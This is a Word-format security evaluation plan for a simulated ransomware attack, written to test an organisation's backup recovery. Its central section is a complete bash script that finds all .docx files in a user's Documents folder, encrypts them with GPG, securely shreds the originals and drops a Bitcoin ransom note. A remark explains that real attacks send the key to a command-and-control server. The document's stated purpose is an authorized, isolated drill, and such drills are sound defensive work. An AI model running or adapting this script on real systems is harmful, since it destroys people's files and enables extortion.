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80" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Security Evaluation Report: Backup Recovery Scenario Test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Document ID:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> SEC-EVAL-{PLACEHOLDER_DATE}-001</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Prepared by:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> {PLACEHOLDER_ANALYST_NAME}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Classification:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Internal — Test Environment Only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Date:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> {PLACEHOLDER_DATE}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">This document outlines the methodology and execution plan for a controlled security evaluation scenario designed to test the organization's backup recovery procedures. The test simulates a ransomware-style attack where </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>GnuPG (GPG)</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> symmetric encryption is applied to Microsoft Word documents (.docx) located in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/home/user/Documents</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> directory. The objective is to assess the effectiveness of existing backup systems, the response time of the IT security team, and the ability of personnel to restore critical data without paying a simulated ransom.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="280" w:after="280"/>
        <w:ind w:start="280" w:end="280" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:bdr w:val="single" w:sz="24" w:space="14" w:color="FFC107"/>
          <w:shd w:fill="FFF3CD" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:bdr w:val="single" w:sz="24" w:space="14" w:color="FFC107"/>
          <w:shd w:fill="FFF3CD" w:val="clear"/>
        </w:rPr>
        <w:t>IMPORTANT NOTE:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bdr w:val="single" w:sz="24" w:space="14" w:color="FFC107"/>
          <w:shd w:fill="FFF3CD" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> This is an authorized security test conducted under the supervision of {PLACEHOLDER_AUTHORIZING_MANAGER}. All activities are confined to the isolated test environment. No production data is affected. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2. Test Scenario Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The scenario is designed to mimic a common attack vector where an internal system is compromised, and file-level encryption is applied. The following steps will be executed by the test automation script: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>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Discovery:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Locate all </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> files within </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/home/user/Documents</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (including subdirectories).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>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Encryption:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Encrypt each file using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>gpg --symmetric --cipher-algo AES256</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> with a strong passphrase. Original files will be securely deleted after encryption, leaving only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>.docx.gpg</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> files.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>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Ransom Note:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Create a file named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>RECOVERY_INSTRUCTIONS.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> on the user's Desktop containing a simulated ransom demand.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ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Logging:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Record all actions to a secure log for post-test analysis. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3. Technical Implementation Details</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3.1 Encryption Script (Bash)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The following bash script will be deployed on the test machine. It uses GPG with a hardcoded passphrase for this controlled test. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>Note: In a real attack, the passphrase would be randomly generated and sent to a command-and-control server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:ind w:start="200" w:end="200" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New;monospace" w:hAnsi="Courier New;monospace"/>
          <w:sz w:val="20"/>
          <w:bdr w:val="single" w:sz="2" w:space="10" w:color="CCCCCC"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New;monospace" w:hAnsi="Courier New;monospace"/>
          <w:sz w:val="20"/>
          <w:bdr w:val="single" w:sz="2" w:space="10" w:color="CCCCCC"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash # Security Test Script - DO NOT USE ON PRODUCTION SYSTEMS PASSPHRASE="test-recovery-scenario-{PLACEHOLDER_PASSPHRASE}" TARGET_DIR="/home/user/Documents" RANSOM_NOTE="$HOME/Desktop/RECOVERY_INSTRUCTIONS.txt" # Find and encrypt all .docx files find "$TARGET_DIR" -type f -name "*.docx" | while read file; do echo "Encrypting: $file" gpg --batch --yes --passphrase "$PASSPHRASE" \ --symmetric --cipher-algo AES256 \ --output "${file}.gpg" "$file" if [ $? -eq 0 ]; then # Securely remove original file shred -u "$file" echo "SUCCESS: $file" else echo "FAILED: $file" fi done # Write ransom note cat &gt; "$RANSOM_NOTE" &lt;&lt; 'EOF' ============================================= YOUR FILES HAVE BEEN ENCRYPTED ============================================= All your .docx documents in /home/user/Documents have been encrypted with AES-256. To recover your files, you must send exactly 0.5 Bitcoin (BTC) to the following address: Bitcoin Address: {PLACEHOLDER_BTC_ADDRESS} After payment, contact us at: {PLACEHOLDER_ATTACKER_EMAIL} Include your personal identifier: {PLACEHOLDER_VICTIM_ID} WARNING: Do not attempt to decrypt files yourself. Any modification will result in permanent data loss. EOF echo "Ransom note written to: $RANSOM_NOTE" echo "Test scenario complete." </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3.2 Ransom Note Content</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The ransom note placed on the Desktop will contain the following elements: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>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Demand:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> 0.5 Bitcoin (BTC) — approximately {PLACEHOLDER_USD_VALUE} USD at current exchange rates.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>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Payment Address:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> A test Bitcoin address generated for this evaluation.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>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Contact:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> A disposable email address for communication.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ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Threat:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Warning against self-decryption attempts. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>4. Expected Impact Assessment</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="114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41"/>
        <w:gridCol w:w="3571"/>
        <w:gridCol w:w="2566"/>
        <w:gridCol w:w="2656"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2641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00"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Asset Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3571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00"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Estimated Count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00"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Criticality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Heading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="2C3E50" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="200"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Recovery Method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Financial Reports (.docx)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="357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{PLACEHOLDER_FIN_COUNT}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High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Daily backup (offsite)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Project Plans (.docx)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="357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{PLACEHOLDER_PROJ_COUNT}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Medium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Weekly backup + version control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Meeting Minutes (.docx)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="357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{PLACEHOLDER_MEET_COUNT}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Low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Email archive / OneDrive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HR Documents (.docx)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="357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{PLACEHOLDER_HR_COUNT}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High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Daily backup (encrypted)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Recovery Procedure Validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The following steps will be executed to validate the backup recovery process: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>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Isolation:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Disconnect the affected machine from the network to prevent further spread.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>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Verification:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Confirm that the encrypted files are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>.docx.gpg</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> and the ransom note exists.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>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Backup Retrieval:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Mount the most recent backup from {PLACEHOLDER_BACKUP_LOCATION}.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>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Restoration:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Copy the original </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>.docx</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> files from backup to the original directory.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>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Integrity Check:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Open a sample of 5 restored files to verify content integrity.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ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Cleanup:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Remove encrypted files and the ransom note from the Desktop. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:start="240" w:end="240" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:i/>
          <w:bdr w:val="single" w:sz="24" w:space="12" w:color="2980B9"/>
          <w:shd w:fill="E8F4FD" w:val="clear"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:bdr w:val="single" w:sz="24" w:space="12" w:color="2980B9"/>
          <w:shd w:fill="E8F4FD" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> The test script includes a decryption fallback. If backup restoration fails, the IT team can decrypt files using the passphrase stored in the secure test log at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:i/>
          <w:bdr w:val="single" w:sz="24" w:space="12" w:color="2980B9"/>
          <w:shd w:fill="E8F4FD" w:val="clear"/>
        </w:rPr>
        <w:t>/var/log/security-test-{PLACEHOLDER_DATE}.log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:bdr w:val="single" w:sz="24" w:space="12" w:color="2980B9"/>
          <w:shd w:fill="E8F4FD" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6. Success Criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The test will be considered successful if the following conditions are met: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/>
        <w:t xml:space="preserve">All encrypted files are restored from backup within </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>4 hours</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> of detection.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/>
        <w:t xml:space="preserve">No data loss occurs (file count and content verified).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/>
        <w:t xml:space="preserve">The ransom note is not acted upon by any personnel.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/>
        <w:t xml:space="preserve">The incident is properly documented and reported to {PLACEHOLDER_REPORTING_EMAIL}.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ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">A post-mortem meeting is scheduled within 48 hours. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>7. Risk Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>To ensure this test does not impact production environments, the following controls are in place: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/>
        <w:t xml:space="preserve">The script is restricted to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/home/user/Documents</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> directory only.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/>
        <w:t xml:space="preserve">A system restore point is created before execution.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start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">All activities are monitored by the security operations center.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ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The test can be aborted immediately by running </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>kill -9 {PLACEHOLDER_PID}</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> from the root console. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>8. Appendices</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Appendix A: Encryption Verification Command</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>To verify that files are properly encrypted without attempting decryption:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:ind w:start="200" w:end="200" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New;monospace" w:hAnsi="Courier New;monospace"/>
          <w:sz w:val="20"/>
          <w:bdr w:val="single" w:sz="2" w:space="10" w:color="CCCCCC"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New;monospace" w:hAnsi="Courier New;monospace"/>
          <w:sz w:val="20"/>
          <w:bdr w:val="single" w:sz="2" w:space="10" w:color="CCCCCC"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t>file *.docx.gpg | grep "GPG encrypted data"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Appendix B: Decryption Command (Emergency Only)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:ind w:start="200" w:end="200" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New;monospace" w:hAnsi="Courier New;monospace"/>
          <w:sz w:val="20"/>
          <w:bdr w:val="single" w:sz="2" w:space="10" w:color="CCCCCC"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New;monospace" w:hAnsi="Courier New;monospace"/>
          <w:sz w:val="20"/>
          <w:bdr w:val="single" w:sz="2" w:space="10" w:color="CCCCCC"/>
          <w:shd w:fill="F4F4F4" w:val="clear"/>
        </w:rPr>
        <w:t>gpg --batch --yes --passphrase "test-recovery-scenario-{PLACEHOLDER_PASSPHRASE}" \ --decrypt --output recovered.docx encrypted.docx.gpg</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="600" w:after="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:bdr w:val="single" w:sz="2" w:space="8" w:color="BDC3C7"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:bdr w:val="single" w:sz="2" w:space="8" w:color="BDC3C7"/>
        </w:rPr>
        <w:t>This document is confidential and intended solely for the use of the security evaluation team. Distribution is limited to {PLACEHOLDER_DISTRIBUTION_LIST}.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="600" w:after="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:bdr w:val="single" w:sz="2" w:space="8" w:color="BDC3C7"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:bdr w:val="single" w:sz="2" w:space="8" w:color="BDC3C7"/>
        </w:rPr>
        <w:t>Document generated on {PLACEHOLDER_TIMESTAMP} | Version 1.2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Times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urier New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 w:before="1440" w:after="1440"/>
      <w:ind w:start="1440" w:end="1440" w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman;Times;serif" w:hAnsi="Times New Roman;Times;serif" w:eastAsia="Times New Roman;Times;serif" w:cs="Times New Roman;Times;serif"/>
      <w:color w:val="1A1A1A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5" w:color="2980B9"/>
      </w:pBdr>
      <w:spacing w:before="480" w:after="283"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans Unicode MS" w:hAnsi="Liberation Sans Unicode MS"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2C3E50"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40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DejaVu Sans" w:cs="Noto Sans Devanagari"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="34495E"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280" w:after="120"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="DejaVu Sans" w:cs="Noto Sans Devanagari"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2C3E50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259" w:leader="none"/>
        <w:tab w:val="right" w:pos="1107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0" w:after="200"/>
      <w:jc w:val="both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2C3E50" w:val="clear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